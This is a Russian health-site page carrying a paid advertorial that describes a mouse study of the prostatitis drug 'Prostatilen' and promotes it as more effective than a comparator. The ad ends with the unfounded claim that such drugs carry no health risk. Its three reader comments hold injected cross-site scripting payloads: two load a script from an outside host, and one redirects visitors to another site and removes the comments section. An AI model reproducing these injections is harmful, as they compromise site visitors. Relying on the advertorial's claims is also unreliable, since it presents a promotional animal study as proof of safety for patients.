Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как лечить простатит: о ч...  >>  Как лечить простатит: о чем могут рассказать мыши?
 
Обратная связь
 

Как лечить простатит: о чем могут рассказать мыши?

Размер шрифта
02 апреля 2015 00:00
  • google_analytics: false
  • Нравится

Получив диагноз «хронический простатит», многие, как это уже принято, откроют интернет, чтобы подробнее узнать о болезни, назначенном лечении, перспективах. И наткнутся на расхожие формулировки «исследования показали», «по результатам исследований…» Каких, зачем? Непонятно! Может, их и не было, а рекламщики приписали это для красного словца?

Как лечить простатит: о чем могут рассказать мыши?

Расставим точки над i: исследования препаратов проводятся в обязательном порядке. Без лабораторных опытов, подтверждающих эффективность и безопасность препарата, ни одно лекарство не окажется в аптеках. Расскажем, как обычно происходит исследование на примере средства «Простатилен».

Ученые взяли лабораторных мышей, выращенных специально для участия в опытах. Им ввели специальные вещества, провоцирующее появление простатита. И позволили болезни развиваться в течение 28 дней.

А дальше началось лечение, которое длилось в течение 30 дней. Мышей разделили на три группы – одна группа, контрольная, должна была выздоравливать самостоятельно. Она нужна для сравнения и понимания естественного хода болезни. Более везучих мышей лечили:  одну группу — «Простатиленом»,  другую — проверенным лекарством или «препаратом сравнения».  При исследованиях важно не только понять, что новый препарат эффективен, но и сравнить с другим, уже изученным.

У всех групп регулярно брались анализы. Измеряли суточный объем мочи (при простатите он уменьшается). Следили за содержанием белка в моче. Если все в норме, его быть не должно. Брали кровь для определения уровня тестостерона. Выработка этого гормона тесно связана с функционированием мужской мочеполовой системы. Также контролировалось содержание  в моче и крови нескольких других специфических веществ, свидетельствующих о состоянии простаты и предстательной железы, например, кислой фосфотазы.

Как лечить простатит: о чем могут рассказать мыши?

Что же показали эти анализы и ежедневные наблюдения? Еще на начальном этапе у животных, которым вводили «Простатилен», существенно снизилось содержание белка в моче – более чем в два раза. Увеличился суточный объем мочи, мочеиспускание приблизилось к норме. У мышей, получавших «препарат сравнения», содержание белка упало примерно в полтора раза.

Также стоит ответить, что  у группы, принимавшей «Простатилен», заметно спал отек и уменьшился объем предстательной железы. А вот показатели тестостерона были примерно равны в обеих группах.

Результат любого исследования – это огромное количество цифр,  таблиц и аналитических данных. С их помощью  проводят сравнительный анализ, который позволяет делать выводы о действии и свойствах лекарственных средств.  В этом  эксперименте сводный анализ показал, что противовоспалительные, восстановительные и лечебные свойства «Простатилена» более выражены по сравнению с другими препаратами, что доказывает его эффективность  при лечении простатита и аденомы простаты.

Теперь мы имеем представление о том, как обычно проходят клинические исследования – множество анализов, систематичные сверки и сравнения. И благодаря этому кропотливому труду мы понимаем, как влияют на организм те или иные вещества и препараты. Можно принимать их без риска для здоровья!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Толстые мужчины умрут от рака простаты   Грецкие орехи улучшают качество спермы   Как решить важные мужские проблемы и всегда быть в силе?   Playboy отказался от голых девушек! Как порно влияет на мозг  
22 февраля 2013Настоящий мужчина всегда говорит правду 12 сентября 2012Обрезание снижает риск развития инфекций!
 
30 августа 2012Грецкие орехи улучшают качество спермы! 09 ноября 2012Кастрация продлевает жизнь
 

Слайдшоу

1
Как мужчине проверить свое здоровье
Вся правда об импотенции
Ваш муж теряет мужественность? Признаки низкого тестостерона

Тесты

1
Яички – удивительный орган
Здорова ли ваша предстательная железа
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.